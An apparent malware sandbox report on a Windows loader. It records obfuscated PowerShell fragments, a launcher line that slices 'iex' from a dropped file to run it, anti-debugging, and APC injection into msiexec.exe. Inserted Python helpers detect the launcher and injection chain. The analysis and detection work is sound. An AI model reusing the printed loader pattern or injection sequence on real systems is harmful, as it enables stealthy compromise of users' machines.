Source: C:\Users\user\Desktop\YrCSUX2O3I.exe | Section loaded: msls31.dll
Source: C:\Users\user\Desktop\YrCSUX2O3I.exe | Section loaded: textinputframework.dll
Source: C:\Users\user\Desktop\YrCSUX2O3I.exe | Section loaded: coreuicomponents.dll
Source: C:\Users\user\Desktop\YrCSUX2O3I.exe | Section loaded: coremessaging.dll
Source: C:\Users\user\Desktop\YrCSUX2O3I.exe | Section loaded: ntmarta.dll
Source: C:\Users\user\Desktop\YrCSUX2O3I.exe | Section loaded: coremessaging.dll
Source: C:\Users\user\Desktop\YrCSUX2O3I.exe | Section loaded: wintypes.dll
Source: C:\Users\user\Desktop\YrCSUX2O3I.exe | Section loaded: wintypes.dll
Source: C:\Users\user\Desktop\YrCSUX2O3I.exe | Section loaded: wintypes.dll
Source: C:\Users\user\Desktop\YrCSUX2O3I.exe | Section loaded: textshaping.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: atl.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mscoree.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: version.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptsp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rsaenh.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptbase.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msasn1.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: gpapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msisip.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wshext.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: appxsip.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: opcservices.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: secur32.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: urlmon.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: iertutil.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: propsys.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wininet.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: kdscli.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ncrypt.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ntasn1.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: miutils.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wmidcom.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: dpapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ntmarta.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: apphelp.dll
Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: apphelp.dll
Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: aclayers.dll
Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: sfc.dll
Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: sfc_os.dll
Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: wininet.dll
Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: iertutil.dll
Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: winhttp.dll
Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: mswsock.dll
Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: iphlpapi.dll
Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: winnsi.dll
Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: urlmon.dll
Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: dnsapi.dll
Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: rasadhlp.dll
Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: fwpuclnt.dll
Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: schannel.dll
Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: mskeyprotect.dll
Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: ntasn1.dll
Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: msasn1.dll
Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: dpapi.dll
Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: cryptsp.dll
Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: rsaenh.dll
Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: cryptbase.dll
Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: gpapi.dll
Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: ncrypt.dll
Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: ncryptsslp.dll
Source: C:\Users\user\Desktop\YrCSUX2O3I.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32
Source: Window Recorder | Window detected: More than 3 window changes detected
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
Source: YrCSUX2O3I.exe | Static file information: File size 1069784 > 1048576

    Data Obfuscation

Source: Yara match | File source: 00000008.00000002.2577978803.000000000452E000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Anti Malware Scan Interface: GetDelegateForFunctionPointer((Nicolett $Paduasoy $Boblegummiens), (Beograd @([IntPtr], [UInt32], [UInt32], [UInt32]) ([IntPtr])))$global:Montricernes = [AppDomain]::CurrentDomain.GetAssemblies()$glob
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Anti Malware Scan Interface: DefineDynamicAssembly((New-Object System.Reflection.AssemblyName($Pisciculture)), $Uvantes).DefineDynamicModule($Subtread, $false).DefineType($Achieves154, $Deltidens, [System.MulticastDelegate])$Doce
Source: C:\Users\user\Desktop\YrCSUX2O3I.exe | Code function: 0_2_004060B0 GetModuleHandleA,LoadLibraryA,GetProcAddress
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | File created: C:\Users\user\AppData\Roaming\Polysulfonate\sangersken\Skolevsens\YrCSUX2O3I.exe (dropped file)
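Added example (not part of the Joe Sandbox report, and not the sample's own code): a Python triage helper for the PowerShell stage recorded in this report. The launcher line in the process-creation list above reads a text file with Get-Content -Raw, slices a 3-character name out of it at offset 2860 and dot-sources that name with the whole buffer as argument; the two AMSI captures in this section show the script building Win32 delegates at run time (GetDelegateForFunctionPointer on a dynamically defined MulticastDelegate type) instead of using Add-Type. The helper parses the launcher pattern, reports which cmdlet the sliced offset would resolve to given the file contents, and scores a script-block capture for the delegate-construction tokens. The file contents are constructed (Hjtryks.Tog itself is not in the report; that offset 2860 holds `iex` is an illustrative assumption), the AMSI fragments are the ones quoted in the report, and nothing is executed.

```python
"""Static triage helpers for a PowerShell loader stage of the kind recorded
in the report: a launcher that reads a text file, slices a short cmdlet name
out of it at a fixed offset and invokes that name on the whole buffer, plus
AMSI-captured fragments that build Win32 delegates at run time.
Nothing here executes PowerShell."""
import re

# Launcher shape: $a=Get-Content -Raw '<path>';$b=$a.SubString(<off>,<len>);.$b($a)
LAUNCHER_RE = re.compile(
    r"\$(?P<buf>\w+)\s*=\s*Get-Content\s+-Raw\s+'(?P<path>[^']+)'\s*;"
    r"\s*\$(?P<cmd>\w+)\s*=\s*\$(?P=buf)\.SubString\((?P<off>\d+),(?P<len>\d+)\)\s*;"
    r"\s*[.&]\s*\$(?P=cmd)\(\$(?P=buf)\)",
    re.IGNORECASE,
)

# Names whose presence at the sliced offset mean "run the buffer as code".
INVOKERS = {"iex", "invoke-expression", "icm", "invoke-command"}

# Tokens that together mean "native API called through a run-time-built
# delegate", the Add-Type-free P/Invoke pattern visible in the AMSI captures.
DELEGATE_TOKENS = (
    "GetDelegateForFunctionPointer",
    "DefineDynamicAssembly",
    "DefineDynamicModule",
    "DefineType",
    "MulticastDelegate",
)

def parse_launcher(cmdline):
    """Return (path, offset, length) from a launcher command line, or None."""
    m = LAUNCHER_RE.search(cmdline)
    if not m:
        return None
    return m.group("path"), int(m.group("off")), int(m.group("len"))

def sliced_cmdlet(blob, offset, length):
    """The name the launcher would invoke, given the file contents."""
    return blob[offset:offset + length]

def triage_launcher(cmdline, blob):
    """Classify a launcher line against the contents of the file it reads."""
    parsed = parse_launcher(cmdline)
    if parsed is None:
        return {"launcher": False}
    path, off, ln = parsed
    name = sliced_cmdlet(blob, off, ln)
    return {
        "launcher": True,
        "path": path,
        "offset": off,
        "cmdlet": name,
        "invokes_buffer": name.strip().lower() in INVOKERS,
        "payload_bytes": len(blob),
    }

def delegate_indicators(script_text):
    """Which reflective-delegate tokens appear in an AMSI / script-block capture."""
    return [t for t in DELEGATE_TOKENS if t in script_text]

def is_reflective_pinvoke(script_text, min_hits=3):
    """True when enough of the delegate-construction chain is present."""
    return len(delegate_indicators(script_text)) >= min_hits

# ---- sample input: the launcher line from the report, constructed file body ----
CMDLINE = ("\"powershell.exe\" -windowstyle minimized \"$Willock=Get-Content -Raw "
           "'C:\\Users\\user\\AppData\\Roaming\\Polysulfonate\\sangersken\\Hjtryks.Tog';"
           "$Fysiologen=$Willock.SubString(2860,3);.$Fysiologen($Willock)\"")
# Assumed layout (constructed, not the real Hjtryks.Tog): 2860 bytes of filler,
# then 'iex', then a script body.
SAMPLE_BLOB = ("#" * 2860) + "iex" + "\n$x = 1\n"
# Fragments as the sandbox's AMSI hook recorded them (quoted from the report).
SAMPLE_AMSI = [
    "GetDelegateForFunctionPointer((Nicolett $Paduasoy $Boblegummiens), "
    "(Beograd @([IntPtr], [UInt32], [UInt32], [UInt32]) ([IntPtr])))",
    "DefineDynamicAssembly((New-Object System.Reflection.AssemblyName($Pisciculture)), "
    "$Uvantes).DefineDynamicModule($Subtread, $false).DefineType($Achieves154, "
    "$Deltidens, [System.MulticastDelegate])",
]

if __name__ == "__main__":
    print(triage_launcher(CMDLINE, SAMPLE_BLOB))
    for frag in SAMPLE_AMSI:
        print(delegate_indicators(frag))
    print(is_reflective_pinvoke("\n".join(SAMPLE_AMSI)))
```

The offset-and-length slice is what makes this launcher cheap to hunt for: the command line never contains the string `iex`, so a detection keyed on cmdlet names misses it, while the `SubString(` followed by `.$var(` shape is stable across renamed variables. The delegate score is deliberately a threshold rather than a single token, because `DefineType` or `MulticastDelegate` alone also appear in legitimate module code.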

    Hooking and other Techniques for Hiding and Protection

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1 (4 times)
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1 (3 times)
Source: C:\Users\user\Desktop\YrCSUX2O3I.exe | Process information set: NOOPENFILEERRORBOX (2 times)
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX (101 times)
Source: C:\Windows\System32\conhost.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 7407
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 2203
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6068 | Thread sleep time: -5534023222112862s >= -30000s
Source: C:\Windows\SysWOW64\msiexec.exe TID: 3916 | Thread sleep time: -220000s >= -30000s
Source: C:\Windows\SysWOW64\msiexec.exe | Last function: Thread delayed (2 times)
Source: C:\Users\user\Desktop\YrCSUX2O3I.exe | Code function: 0_2_004055D5 GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose
Source: C:\Users\user\Desktop\YrCSUX2O3I.exe | Code function: 0_2_00406089 FindFirstFileW,FindClose
Source: C:\Users\user\Desktop\YrCSUX2O3I.exe | Code function: 0_2_00402706 FindFirstFileW
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
Source: ModuleAnalysisCache.2.dr | Binary or memory string: Remove-NetEventVmNetworkAdapter
Source: ModuleAnalysisCache.2.dr | Binary or memory string: Add-NetEventVmNetworkAdapter
Source: msiexec.exe, 00000008.00000003.2397727614.0000000007F99000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2466820778.0000000007F99000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2161988964.0000000007F99000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2408835178.0000000007F99000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2562006346.0000000007FD8000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2249580479.0000000007F99000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2209315293.0000000007F99000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2397727614.0000000007FD8000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2295597744.0000000007FD8000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2352334753.0000000007FD8000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2538548894.0000000007F99000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW
Source: ModuleAnalysisCache.2.dr | Binary or memory string: Get-NetEventVmNetworkAdapter
Source: msiexec.exe, 00000008.00000003.2562006346.0000000007FD8000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2397727614.0000000007FD8000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2295597744.0000000007FD8000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2352334753.0000000007FD8000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2262078863.0000000007FD8000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2340671273.0000000007FD8000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2374936208.0000000007FD8000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2307435185.0000000007FD8000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2363131954.0000000007FD8000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2220377097.0000000007FD8000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2479027485.0000000007FD8000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAWswsock.dll.mui6
Source: C:\Users\user\Desktop\YrCSUX2O3I.exe | API call chain: ExitProcess graph end node (graph_0-3121)
Source: C:\Users\user\Desktop\YrCSUX2O3I.exe | API call chain: ExitProcess graph end node (graph_0-3127)
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information queried: ProcessInformation

    Anti Debugging

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Thread information set: HideFromDebugger
Source: C:\Windows\SysWOW64\msiexec.exe | Thread information set: HideFromDebugger
Source: C:\Windows\SysWOW64\msiexec.exe | Process queried: DebugPort
Source: C:\Users\user\Desktop\YrCSUX2O3I.exe | Code function: 0_2_004060B0 GetModuleHandleA,LoadLibraryA,GetProcAddress
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process token adjusted: Debug

    HIPS / PFW / Operating System Protection Evasion

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created / APC Queued / Resumed: C:\Windows\SysWOW64\msiexec.exe
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Thread APC queued: target process: C:\Windows\SysWOW64\msiexec.exe
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Memory written: C:\Windows\SysWOW64\msiexec.exe base: 4460000
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"
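Added example (not part of the Joe Sandbox report, and not the sandbox's own detection logic): correlation code for the Early Bird sequence the four lines above record for powershell.exe against msiexec.exe, namely create the target suspended, write into its address space, queue an APC to a thread of the target, then resume it. It runs over a constructed API-trace event list that mirrors that chain and adds a benign suspended create/resume pair with nothing in between, which must not fire. Field names, pids and the sensor schema are assumptions; the memory base is the one the report shows.

```python
"""Correlate per-process API events into an Early Bird APC injection verdict.
The chain is keyed on (actor pid, target pid) and must occur in order:
suspended CreateProcess -> cross-process memory write -> APC queued to the
target -> target thread resumed.  Events are constructed for the example;
their schema (op, pid, target_pid, ts, ...) is an assumption, not a real
sensor's format."""
from collections import defaultdict

CREATE_SUSPENDED = 0x00000004          # dwCreationFlags bit in CreateProcess

# Expected order of the Early Bird chain.
CHAIN = ("process_create_suspended", "memory_write", "apc_queued", "thread_resume")

def normalise(ev):
    """Map a raw event to a chain stage, or None if it is not relevant."""
    op = ev["op"]
    if op == "CreateProcess" and ev.get("flags", 0) & CREATE_SUSPENDED:
        return "process_create_suspended"
    if op in ("WriteProcessMemory", "NtWriteVirtualMemory") and ev["pid"] != ev["target_pid"]:
        return "memory_write"
    if op in ("QueueUserAPC", "NtQueueApcThread") and ev["pid"] != ev["target_pid"]:
        return "apc_queued"
    if op in ("ResumeThread", "NtResumeThread") and ev["pid"] != ev["target_pid"]:
        return "thread_resume"
    return None

def detect_early_bird(events):
    """One finding per (actor, target) pair that completes CHAIN in order."""
    progress = defaultdict(lambda: {"stage": 0, "trace": []})
    findings = []
    for ev in sorted(events, key=lambda e: e["ts"]):
        stage = normalise(ev)
        if stage is None:
            continue
        key = (ev["pid"], ev["target_pid"])
        st = progress[key]
        # Advance only on the next expected stage; repeats of the current stage
        # (several writes, several APCs) are recorded but do not advance.
        if CHAIN[st["stage"]] == stage:
            st["stage"] += 1
            st["trace"].append((ev["ts"], stage))
        elif st["stage"] > 0 and CHAIN[st["stage"] - 1] == stage:
            st["trace"].append((ev["ts"], stage))
        if st["stage"] == len(CHAIN):
            findings.append({
                "actor": ev["image"],
                "actor_pid": key[0],
                "target": ev["target_image"],
                "target_pid": key[1],
                "trace": list(st["trace"]),
            })
            st["stage"], st["trace"] = 0, []
    return findings

# ---- constructed sample mirroring the report's powershell.exe -> msiexec.exe chain ----
PS, MSI = 5240, 6116                    # assumed pids
SAMPLE_EVENTS = [
    {"ts": 1, "pid": PS, "image": "powershell.exe", "op": "CreateProcess",
     "target_pid": MSI, "target_image": "msiexec.exe", "flags": CREATE_SUSPENDED},
    {"ts": 2, "pid": PS, "image": "powershell.exe", "op": "NtWriteVirtualMemory",
     "target_pid": MSI, "target_image": "msiexec.exe", "base": 0x4460000},  # base from the report
    {"ts": 3, "pid": PS, "image": "powershell.exe", "op": "NtQueueApcThread",
     "target_pid": MSI, "target_image": "msiexec.exe"},
    {"ts": 4, "pid": PS, "image": "powershell.exe", "op": "NtResumeThread",
     "target_pid": MSI, "target_image": "msiexec.exe"},
    # Benign control: an installer starts a helper suspended and resumes it untouched.
    {"ts": 5, "pid": 900, "image": "setup.exe", "op": "CreateProcess",
     "target_pid": 901, "target_image": "helper.exe", "flags": CREATE_SUSPENDED},
    {"ts": 6, "pid": 900, "image": "setup.exe", "op": "ResumeThread",
     "target_pid": 901, "target_image": "helper.exe"},
]

if __name__ == "__main__":
    for f in detect_early_bird(SAMPLE_EVENTS):
        print(f"{f['actor']}({f['actor_pid']}) -> {f['target']}({f['target_pid']}):",
              [s for _, s in f["trace"]])
```

Keying on the (actor, target) pair and insisting on order is what separates this from a plain "suspended process created" alert: debuggers, installers and some launchers create suspended children and resume them, but they do not write into the child and queue an APC to its initial thread first. Note that the report's own rows fit this chain exactly, including the "Process created: msiexec.exe" entry that closes the list.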
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation (7 times)
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0013~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformationJump to behavior
